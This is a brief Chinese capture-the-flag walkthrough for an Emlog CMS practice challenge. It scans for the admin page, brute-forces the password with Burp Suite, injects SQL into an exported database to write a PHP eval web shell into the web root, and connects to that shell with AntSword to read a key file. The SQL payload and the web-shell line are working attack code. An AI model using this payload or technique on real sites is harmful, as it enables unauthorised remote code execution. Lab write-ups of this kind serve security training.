CMS系统漏洞分析溯源(第6题)
一.解题思路
得到用户名之后爆破密码登录后台,再写入一句话木马
二.操作步骤
1.御剑扫描
可以看到后台登录界面为http://ip:port/servlets/
2.后台登录:
已知用户名为mozhe777
登录后台
使用Burpsuite抓包,进行暴力破解
设置类型为sniper
开始攻击
得到密码为qwer1234
3.成功登录后台,导出数据库,添加一句话
在导出的文件中添加以下字段
Drop TABLE IF EXISTS emlog_shell;
Create Table emlog_shell(`cmd` longtext NOT NULL);
Insert INTO emlog_shell VALUES('<?php @eval($_POST[pass]);?>');
Select cmd from emlog_shell into outfile '/var/www/html/pass.php';
Drop TABLE IF EXISTS emlog_shell;
4.使用蚁剑进行连接
配置参数
可以看到刚才新生成的pass.php文件
Key文件位于根目录下
网络信息安全—ploto